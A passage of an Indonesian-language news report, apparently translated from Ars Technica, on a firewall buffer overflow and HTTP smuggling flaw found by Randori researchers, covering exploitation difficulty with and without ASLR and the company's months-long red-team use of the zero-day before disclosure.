“Pada perangkat dengan ASLR diaktifkan (yang tampaknya menjadi kasus di sebagian besar perangkat keras), eksploitasi sulit tetapi mungkin,” tulis peneliti Randori. “Pada perangkat tervirtualisasi (firewall seri VM), eksploitasi secara signifikan lebih mudah karena kurangnya ASLR dan Randori mengharapkan eksploitasi publik akan muncul. Peneliti Randori belum mengeksploitasi buffer overflow untuk menghasilkan eksekusi kode terkontrol pada versi perangkat keras tertentu dengan CPU bidang manajemen berbasis MIPS karena arsitektur big endian mereka, meskipun overflow dapat dijangkau pada perangkat ini dan dapat dieksploitasi untuk membatasi ketersediaan layanan .”
Apa yang membuatmu begitu lama?

Posting Randori mengatakan peneliti perusahaan menemukan buffer overflow dan cacat penyelundupan HTTP November lalu. Beberapa minggu kemudian, perusahaan “mulai menggunakan rantai kerentanan secara resmi sebagai bagian dari platform tim merah Randori yang berkelanjutan dan otomatis.”

“Alat dan teknik tim merah, termasuk eksploitasi zero-day, diperlukan untuk keberhasilan pelanggan kami dan dunia keamanan siber secara keseluruhan,” tulis CTO Randori David Wolpoff dalam sebuah posting. “Namun, seperti alat ofensif lainnya, informasi kerentanan harus ditangani dengan hati-hati dan dengan rasa hormat yang seharusnya. Misi kami adalah untuk memberikan pengalaman yang sangat berharga bagi pelanggan kami, sekaligus mengenali dan mengelola risiko terkait.”

Selengkapnya : Arstechnica